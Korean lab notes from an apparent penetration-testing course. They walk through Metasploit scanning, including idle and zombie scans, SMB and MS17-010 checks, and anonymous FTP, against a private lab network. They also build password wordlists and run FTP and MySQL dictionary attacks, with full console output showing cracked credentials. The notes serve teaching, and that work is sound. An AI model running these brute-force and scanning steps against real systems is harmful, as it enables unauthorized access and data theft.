msf auxiliary(scanner/ftp/ftp_login) > set stop_on_success true // ip, passwd를 매치하면 멈춘다.
false는 찾아도 계속 돌림
@ 06_Metasploit
1. Metasploit
- 스캔, 취약점 공격, 악성코드 제작을 할 수 있는 다양한 소스 코드가 지원되는 모의 해킹 도구이다.
- Kali Linux에는 기본적으로 설치되어 있다.
1) Metasploit 주요 명령어
- 다음은 Metasploit에서 주로 사용하는 명령어이다.
msfconsole 메타스플로잇 실행 파일
msfdb 메타스플로잇 DB 관리 실행 파일
msfvenom 쉘 프롬프트에서 악성 코드를 제작할때 사용하는 실행 파일
msfupdate 메타스플로잇 업데이트 실행 파일
root@kali:~# cd /usr/share/metasploit-framework
root@kali:/usr/share/metasploit-framework# ls
2) 'Ruby' 언어로 제작된 소스 코드
- 메타스플로잇에서 제공하는 소스 코드는 Ruby 언어로 제작되어 있다.
root@kali:/usr/share/metasploit-framework# cd modules
root@kali:/usr/share/metasploit-framework/modules# ls
root@kali:/usr/share/metasploit-framework/modules# cd auxiliary
root@kali:/usr/share/metasploit-framework/modules/auxiliary# ls
root@kali:/usr/share/metasploit-framework/modules/auxiliary# cd scanner
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner# ls
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner# cd portscan
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/portscan# ls
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/portscan# vi syn.rb
Ruby 언어로 되어있다.
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/portscan# cd ../../../../
root@kali:/usr/share/metasploit-framework# ls
3) 사전 대입 파일 제공
- 아이디/패스워드를 크래킹할 수 있는 사전 대입 파일을 제공한다.
root@kali:/usr/share/metasploit-framework# ls data
root@kali:/usr/share/metasploit-framework# ls data/wordlists
root@kali:/usr/share/metasploit-framework/data/wordlists# cat tomcat_mgr_default_userpass.txt
userpass 파일은 id, password가 같이 들어가있다.
root@kali:/usr/share/metasploit-framework/data/wordlists# cat tomcat_mgr_default_users.txt
root@kali:/usr/share/metasploit-framework# cat data/wordlists/tomcat_mgr_default_pass.txt
root@kali:/usr/share/metasploit-framework# cd
root@kali:~#
2. 사전 대입 파일 제작
1) 계정 아이디 'user.list' 파일 생성
root@kali:~# mkdir wordlists && cd wordlists
root@kali:~/wordlists# cat << EOF >> user.list
admin
administrator
root
msfadmin
user1
user2
user01
user02
tomcat
postgres
mysql
test
tester
ftpuser
ftpusers
cisco
EOF
root@kali:~/wordlists# cat user.list
2) 계정 패스워드 'pass.list' 파일 생성
root@kali:~/wordlists# cat << EOF >> pass.list
admin
administrator
root
toor
toor1234.
msfadmin
user1
user2
user01
user02
tomcat
postgres
mysql
test
tester
cisco
ftpuser
ftpusers
1111
0000
1234
1234qwer
qwerasdf
EOF
root@kali:~/wordlists# cat pass.list
3) 계정 아이디/패스워드 'userpass.list' 파일 생성
root@kali:~/wordlists# cat << EOF >> userpass.list
admin 1111
admin 1234
admin 0000
administrator toor1234.
root
root toor
root toor1234.
msfadmin msfadmin
user1 user1
user2 user2
user01 user01
user01 toor1234.
user02 user02
tomcat tomcat
postgres postgres
test test
tester tester
mysql mysql
cisco cisco
ftpuser ftpuser
ftpusers ftpusers
EOF
root@kali:~/wordlists# cat userpass.list
root@kali:~/wordlists# cd
root@kali:~#
3. msf & postgresql 연동
- 메타스플로잇은 postgresql DBMS와 연동하면 메타스플로잇 내에서 실행했던 내용들을 DB에 저장한다.
- 실행했던 내용들이 DB에 저장되어 있기 때문에 정보 확인 및 실행이 신속하다.
1) postgresql 시작 및 활성화
root@kali:~# service postgresql start
root@kali:~# update-rc.d postgresql enable
root@kali:~# service postgresql status
2) msfdb 초기화 및 시작
root@kali:~# msfdb
root@kali:~# msfdb init
처음 초기화할때 msfdb init을 한다. 두 번째부터는 msfdb reinit이다.
root@kali:~# msfdb start
3) msfconsole 시작 및 DB 연동 확인
root@kali:~# msfconsole
msf > db_status
연동이 잘되었다.
4) 'db_nmap' 스캔 및 정보 확인
msf > db_nmap -sS -sV 192.168.20.200
명령어가 db_nmap이지 nmap과 똑같다.
msf > hosts
nmap 스캔한 타겟 ip 및 mac 주소를 확인할 수 있다.
msf > services 192.168.20.200
ip에 대한 스캔결과를 확인할 수 있다.
5) 'db_nmap' 결과 DB 저장 확인
msf > exit
root@kali:~#
root@kali:~# msfconsole -q
msfconsole -q 는 메타스플로잇 실행시 베너 출력을 안한다.
현재 db와 연동되어 명령어에 대한 결과같이 db에 저장되어있어 나갔다들어와도 확인할 수 있다.
msf > services 192.168.20.200
6) msfdb 초기화 및 시작
msf > exit
root@kali:~#
root@kali:~# msfdb reinit
msfdb를 초기화 한다.
root@kali:~# msfconsole -q
msf >
msf > hosts
msfdb 가 초기화되어 내용이 사라진걸 확인할 수 있다.
4. 'nmap' 스캔
1) 'db_nmap' 스캔
msf > db_nmap -sS -sV -O 192.168.20.100
msf > db_nmap -sS -sV -O 192.168.20.200
msf > db_nmap -sS -sV -O 192.168.20.201
msf > db_nmap -sS -sV -O 192.168.20.202
msf > db_nmap -sS -sV -O 192.168.20.204
msf > hosts
msf > services 192.168.20.200
msf > exit
root@kali:~#
root@kali:~# msfdb reinit
Creating database user 'msf'
새 롤의 암호:
암호 확인:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
2) 외부 nmap 스캔 파일 사용
root@kali:~# ls nmapscan
CentOS.gnmap CentOS.scan Meta.xml Windows2008.nmap Windows7.gnmap Windows7.xml
CentOS.nmap CentOS.xml Windows2008.gnmap Windows2008.xml Windows7.nmap
root@kali:~# msfconsole -q
msf >
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
msf >
msf > db_import /root/nmapscan/CentOS.xml
msf > db_import /root/nmapscan/Windows2008.xml
msf > db_import /root/nmapscan/Windows7.xml
msf > db_import /root/nmapscan/Meta.xml
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.20.200 00:0c:29:63:3b:f3 Linux 2.6.X server
192.168.20.201 00:0c:29:89:7b:8d Windows 7 client
192.168.20.202 00:0c:29:82:c5:58 Windows 7 client
192.168.20.204 00:0c:29:df:d7:b3 Linux 2.6.X server
msf > services 192.168.20.200
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.20.200 21 tcp ftp open vsftpd 2.0.5
192.168.20.200 22 tcp ssh open OpenSSH 4.3 protocol 2.0
192.168.20.200 23 tcp telnet open BSD-derived telnetd
192.168.20.200 25 tcp smtp open Sendmail 8.13.8/8.13.8
192.168.20.200 53 tcp domain open ISC BIND 9.3.6-P1
192.168.20.200 80 tcp http open Apache httpd 2.2.3 (CentOS)
192.168.20.200 110 tcp pop3 open Dovecot pop3d
192.168.20.200 111 tcp rpcbind open 2 RPC #100000
192.168.20.200 143 tcp imap open Dovecot imapd
192.168.20.200 443 tcp http open Apache httpd 2.2.3 (CentOS)
192.168.20.200 993 tcp imap open Dovecot imapd
192.168.20.200 995 tcp pop3 open Dovecot pop3d
msf > exit
root@kali:~#
root@kali:~# msfdb reinit
Creating database user 'msf'
새 롤의 암호:
암호 확인:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
root@kali:~# msfconsole -q
msf >
5. 메타스플로잇을 이용한 스캔
1) Idle Scan
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/ip
ipidseq.rb
- 목적 : TCP Syn을 전송하여 서비스가 비활성화되어 있는 시스템을 스캔한다.
- 용도 : 스캔 결과에 나온 시스템 IP 주소를 공격에 사용하기 위한 스푸핑 IP 주소 및 좀비 시스템으로 활용할 수 있다.
- search ipid
포트 80이 열려있는걸 찾는다. -> Incremental! = 놀고있는 pc이다. - 좀비 pc로 사용가능하다 -> 좀비pc 80포트를 이용해 syn를 보낸다. -> 공격자를 숨길 수 있음
msf auxiliary(scanner/ip/ipidseq) > set interface eth1
msf auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.20.0/24
msf auxiliary(scanner/ip/ipidseq) > set threads 16
80 포트 서비스 비활성화된 시스템을 찾는다.
msf auxiliary(scanner/ip/ipidseq) > exploit
[*] 192.168.20.1's IPID sequence class: Incremental! <- TCP 80 포트 비활성화
[*] Scanned 27 of 256 hosts (10% complete)
[*] Scanned 56 of 256 hosts (21% complete)
[*] Scanned 79 of 256 hosts (30% complete)
[*] 192.168.20.100's IPID sequence class: All zeros
[*] Scanned 105 of 256 hosts (41% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] 192.168.20.204's IPID sequence class: All zeros
[*] 192.168.20.201's IPID sequence class: Incremental! <- TCP 80 포트 비활성화
[*] 192.168.20.200's IPID sequence class: All zeros
[*] 192.168.20.202's IPID sequence class: Incremental! <- TCP 80 포트 비활성화
[*] Scanned 206 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ip/ipidseq) > back
msf >
202, 201 ip는 TCP 80 포트 서비스가 비활성화 되어있다!
- CentOS에서 와이어샤크를 실행하고 캡처를 시작한다.
- Kali에서 'ipidseq' 스캔 결과로 출력된 '192.168.20.202' 주소를 스푸핑 주소로 설정하여 nmap 스캔을 실시한다.
msf > db_nmap -Pn -sI 192.168.20.202 192.168.20.200
- CentOS 와이어샤크 캡처 내용 중에 출발지 IP 주소가 '192.168.20.202'인 Syn 패켓들을 확인한다.
192.168.20.202(좀비PC) ip가 80 포트를 이용해 192.168.20.200 한테 syn를 보내고 있다.
- 확인이 완료되었다면, CentOS 와이어샤크를 종료한다.
2) Port Scan
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
ack.rb ftpbounce.rb syn.rb tcp.rb xmas.rb
- 목적 : TCP Syn을 전송하여 TCP 서비스가 활성화 되어 있는 시스템을 스캔한다.
- 용도 : 스캔 결과에 나온 시스템 IP 주소를 공격에 사용하기 위한 스푸핑 IP 주소 및 좀비 시스템으로 활용할 수 있다.
활성화되어 있는 TCP 서비스 관련 취약점을 이용한 공격 타켓으로 선정될 수 있다.
msf > search portscan
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(scanner/portscan/syn) > show options
msf auxiliary(scanner/portscan/syn) > set interface eth1
msf auxiliary(scanner/portscan/syn) > set rhosts 192.168.20.200
msf auxiliary(scanner/portscan/syn) > set ports 1-1000
msf auxiliary(scanner/portscan/syn) > set threads 16
msf auxiliary(scanner/portscan/syn) > show options
msf auxiliary(scanner/portscan/syn) > exploit
192.168.20.200 는 위 포트들이 open된 걸 확인할 수 있다.
3) SMB 스캔
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/smb
pipe_auditor.rb smb_enum_gpp.rb smb_lookupsid.rb
pipe_dcerpc_auditor.rb smb_enumshares.rb smb_ms17_010.rb
psexec_loggedin_users.rb smb_enumusers.rb smb_uninit_cred.rb
smb1.rb smb_enumusers_domain.rb smb_version.rb
smb2.rb smb_login.rb
- 목적 : TCP Syn(목적지 TCP 445 포트)을 전송하여 SMB 서비스(NetBios)가 활성화된 시스템을 스캔한다.
- NetBios : 네트워크를 통하여 윈도우 시스템 간에 데이터를 공유하는 기능을 수행한다. (TCP 445)
- 용도 : SMB 스캔 결과에 나온 Windows 시스템의 SMB 취약점 여부를 검사하여 SMB 취약점을 이용한 공격을 할 수 있다.
msf > search smb_version
msf auxiliary(scanner/smb/smb_version) > show options
msf auxiliary(scanner/smb/smb_version) > set rhosts 192.168.20.0/24
msf auxiliary(scanner/smb/smb_version) > set threads 16
msf auxiliary(scanner/smb/smb_version) > show options
msf auxiliary(scanner/smb/smb_version) > exploit
201, 202 에서 포트 445 활성화 된걸 찾을 수 있다.
4) SMB 취약점(ms17_010) 시스템 스캔
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/smb
pipe_auditor.rb smb_enum_gpp.rb smb_lookupsid.rb
pipe_dcerpc_auditor.rb smb_enumshares.rb smb_ms17_010.rb
psexec_loggedin_users.rb smb_enumusers.rb smb_uninit_cred.rb
smb1.rb smb_enumusers_domain.rb smb_version.rb
smb2.rb smb_login.rb
- 목적 : 'ms17_010' SMB 취약점을 갖고 있는 Windows 시스템을 스캔한다.
- 'ms17_010' SMB 취약점 : 원격 코드가 실행되어 백도어 및 권한 상승 문제가 발생한다.
- 참고 사이트 : https://www.exploit-db.com/exploits/42315
msf > search ms17_010
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.20.0/24
msf auxiliary(scanner/smb/smb_ms17_010) > set threads 16
msf auxiliary(scanner/smb/smb_ms17_010) > show options
msf auxiliary(scanner/smb/smb_ms17_010) > exploit
201, 202 에서 ms17_010 취약점이 발견되었다.
5) FTP 스캔
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/ftp
anonymous.rb easy_file_sharing_ftp.rb konica_ftp_traversal.rb
bison_ftp_traversal.rb ftp_login.rb pcman_ftp_traversal.rb
colorado_ftp_traversal.rb ftp_version.rb titanftp_xcrc_traversal.rb
- 목적 : TCP Syn(목적지 TCP 21 포트)을 전송하여 FTP 서비스 활성화된 시스템을 스캔한다.
- 용도 : FTP 서비스가 활성화된 시스템을 찾아서 FTP 사전 대입 공격 및 FTP 서비스 취약점을 이용한 공격을 할 수 있다.
msf > search ftp_version
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > show options
msf auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.20.0/24
msf auxiliary(scanner/ftp/ftp_version) > set threads 16
msf auxiliary(scanner/ftp/ftp_version) > show options
msf auxiliary(scanner/ftp/ftp_version) > exploit
200, 201, 204는 ftp 서비스가 활성화 되어있다.
msf auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous
msf auxiliary(scanner/ftp/anonymous) > show options
msf auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.20.0/24
msf auxiliary(scanner/ftp/anonymous) > set threads 16
msf auxiliary(scanner/ftp/anonymous) > exploit
200, 201, 204는 익명계정으로 접속이 가능하다.
msf auxiliary(scanner/ftp/anonymous) > back
msf > exit
root@kali:~# msfdb reinit
Creating database user 'msf'
새 롤의 암호:
암호 확인:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
root@kali:~#
root@kali:~# msfconsole -q
msf >
6) 'nmap'을 이용한 스캔
msf > db_nmap -sS -sV -A -p1-10000 -v 192.168.20.100
msf > db_nmap -sS -sV -A -p1-10000 -v 192.168.20.200
msf > db_nmap -sS -sV -A -p1-10000 -v 192.168.20.201
msf > db_nmap -sS -sV -A -p1-10000 -v 192.168.20.202
msf > db_nmap -sS -sV -A -p1-10000 -v 192.168.20.204
msf > hosts
msf > services 192.168.20.100
msf > services 192.168.20.200
msf > services 192.168.20.201
msf > services 192.168.20.202
msf > services 192.168.20.204
msf > exit
root@kali:~#
6. FTP 사전 대입 공격
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/ftp
anonymous.rb easy_file_sharing_ftp.rb konica_ftp_traversal.rb
bison_ftp_traversal.rb ftp_login.rb pcman_ftp_traversal.rb
colorado_ftp_traversal.rb ftp_version.rb titanftp_xcrc_traversal.rb
- FTP 서비스가 활성화된 서버로 FTP 로그인을 시도하여 ID/PASSWORD를 대입하는 공격이다.
- 공격자가 'ID/PASSWORD'를 알게되면 FTP 로그인을 실시하여 파일 업로드, 권한 상승, 파일 삭제 및 조작 등과 같은 문제가 발생한다.
1) 'ftp_version'을 이용한 FTP 스캔
root@kali:~# msfconsole -q
msf > search ftp_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ftp/ftp_version normal FTP Version Scanner
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.20.0/24
rhosts => 192.168.20.0/24
msf auxiliary(scanner/ftp/ftp_version) > set threads 16
threads => 16
msf auxiliary(scanner/ftp/ftp_version) > exploit
[*] Scanned 33 of 256 hosts (12% complete)
[*] Scanned 54 of 256 hosts (21% complete)
[*] Scanned 80 of 256 hosts (31% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[+] 192.168.20.201:21 - FTP Banner: '220 Microsoft FTP Service\x0d\x0a'
[+] 192.168.20.200:21 - FTP Banner: '220 (vsFTPd 2.0.5)\x0d\x0a'
[+] 192.168.20.204:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 234 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ftp/ftp_version) > search ftp_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ftp/ftp_login normal FTP Authentication Scanner
2) 'ftp_login'을 이용한 사전 대입 공격
msf auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(scanner/ftp/ftp_login) > show options
Module options (auxiliary/scanner/ftp/ftp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record anonymous/guest logins to the database
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.20.200
rhosts => 192.168.20.200
msf auxiliary(scanner/ftp/ftp_login) > set user_file /root/wordlists/user.list
user_file => /root/wordlists/user.list
msf auxiliary(scanner/ftp/ftp_login) > set pass_file /root/wordlists/pass.list
pass_file => /root/wordlists/pass.list
msf auxiliary(scanner/ftp/ftp_login) > set stop_on_success true
stop_on_success => true
msf auxiliary(scanner/ftp/ftp_login) > show options
Module options (auxiliary/scanner/ftp/ftp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /root/wordlists/pass.list no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record anonymous/guest logins to the database
RHOSTS 192.168.20.200 yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)
STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /root/wordlists/user.list no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.20.200:21 - 192.168.20.200:21 - Starting FTP login sweep
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: admin:admin (Incorrect: )
~ 중간 생략 ~
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: root: (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: root:root (Incorrect: )
[+] 192.168.20.200:21 - 192.168.20.200:21 - Login Successful: root:toor
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ftp/ftp_login) >
msf auxiliary(scanner/ftp/ftp_login) > unset user_file
Unsetting user_file...
msf auxiliary(scanner/ftp/ftp_login) > unset pass_file
Unsetting pass_file...
msf auxiliary(scanner/ftp/ftp_login) > set stop_on_success false
stop_on_success => false
msf auxiliary(scanner/ftp/ftp_login) > set userpass_file /root/wordlists/userpass.list
userpass_file => /root/wordlists/userpass.list
msf auxiliary(scanner/ftp/ftp_login) >
msf auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.20.200:21 - 192.168.20.200:21 - Starting FTP login sweep
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: admin:1111 (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: admin:1234 (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: admin:0000 (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: administrator:toor1234. (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: root: (Incorrect: )
[+] 192.168.20.200:21 - 192.168.20.200:21 - Login Successful: root:toor
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: msfadmin:msfadmin (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: user1:user1 (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: user2:user2 (Incorrect: )
[+] 192.168.20.200:21 - 192.168.20.200:21 - Login Successful: user01:user01
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: user02:user02 (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: tomcat:tomcat (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: postgres:postgres (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: mysql:mysql (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: cisco:cisco (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: test:test (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: tester:tester (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: ftpuser:ftpuser (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: ftpusers:ftpusers (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ftp/ftp_login) >
3) FTP 로그인 시도
- Windows7에서 검색된 ID/PASSWORD(root/toor, user01/user01)을 이용하여 FTP 서버 로그인을 시도한다.
- Ctrl+R -> cmd 엔터
C:\Users\Administrator>ftp 192.168.20.200
192.168.20.200에 연결되었습니다.
220 (vsFTPd 2.0.5)
사용자(192.168.20.200:(none)):
331 Please specify the password.
암호:
230 Login successful.
ftp>
ftp> quit
221 Goodbye.
4) 취약점 해결 방안
- FTP 패스워드 복잡성 권장
- 익명 사용자(anonymous) 로그인 불가
- 동일한 IP 주소로 여러번 로그인 시도 차단
Ex) Windows2008(192.168.20.201), Meta(192.168.20.204) FTP 사전 대입 공격을 실시하여 ID/PASSWORD을 크래킹한다.
- 사전 대입 공격으로 획득한 ID/PASSWORD을 이용하여 Windows7에서 타겟으로 FTP 로그인을 시도한다.
- Windows2008 FTP ID/PASSWORD?
- Meta FTP ID/PASSWORD?
7. MySQL 사전 대입 공격
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/mysql
mysql_authbypass_hashdump.rb mysql_login.rb mysql_writable_dirs.rb
mysql_file_enum.rb mysql_schemadump.rb
mysql_hashdump.rb mysql_version.rb
- MySQL 서비스가 활성화된 서버로 MySQL 원격 로그인을 시도하여 ID/PASSWORD를 대입하는 공격이다.
- 공격자가 ID/PASSWORD을 알게되면, MySQL 원격 로그인 이후에 DB 안에 있는 내용들을 조작하거나 유출되는 문제가 발생된다.
1) 'mysql_version'을 이용한 MySQL 스캔
msf auxiliary(scanner/ftp/ftp_login) > search mysql_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_version normal MySQL Server Version Enumeration
msf auxiliary(scanner/ftp/ftp_login) > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(scanner/mysql/mysql_version) > show options
Module options (auxiliary/scanner/mysql/mysql_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/mysql/mysql_version) > set rhosts 192.168.20.0/24
rhosts => 192.168.20.0/24
msf auxiliary(scanner/mysql/mysql_version) > set threads 16
threads => 16
msf auxiliary(scanner/mysql/mysql_version) > exploit
[*] Scanned 28 of 256 hosts (10% complete)
[*] Scanned 53 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 130 of 256 hosts (50% complete)
[*] Scanned 158 of 256 hosts (61% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 206 of 256 hosts (80% complete)
[-] 192.168.20.204:3306 - The connection to 192.168.20.204:3306 timed out
[*] Scanned 237 of 256 hosts (92% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
2) 'mysql_login'을 이용한 사전 대입 공격
msf auxiliary(scanner/mysql/mysql_version) > search mysql_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
msf auxiliary(scanner/mysql/mysql_version) > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.20.204
rhosts => 192.168.20.204
msf auxiliary(scanner/mysql/mysql_login) > set user_file /root/wordlists/user.list
user_file => /root/wordlists/user.list
msf auxiliary(scanner/mysql/mysql_login) > set pass_file /root/wordlists/pass.list
pass_file => /root/wordlists/pass.list
msf auxiliary(scanner/mysql/mysql_login) > set threads 16
threads => 16
msf auxiliary(scanner/mysql/mysql_login) > set stop_on_success true
stop_on_success => true
msf auxiliary(scanner/mysql/mysql_login) > exploit
[+] 192.168.20.204:3306 - 192.168.20.204:3306 - Found remote MySQL version 5.0.51a
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: admin:admin (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
~ 중간 생략 ~
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: root:administrator (Incorrect: Access denied for user 'root'@'192.168.20.50' (using password: YES))
[+] 192.168.20.204:3306 - 192.168.20.204:3306 - Success: 'root:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mysql/mysql_login) > unset user_file
Unsetting user_file...
msf auxiliary(scanner/mysql/mysql_login) > unset pass_file
Unsetting pass_file...
msf auxiliary(scanner/mysql/mysql_login) > set userpass_file /root/wordlists/userpass.list
userpass_file => /root/wordlists/userpass.list
msf auxiliary(scanner/mysql/mysql_login) >
msf auxiliary(scanner/mysql/mysql_login) > set stop_on_success false
stop_on_success => false
msf auxiliary(scanner/mysql/mysql_login) > exploit
[+] 192.168.20.204:3306 - 192.168.20.204:3306 - Found remote MySQL version 5.0.51a
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: admin:1111 (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
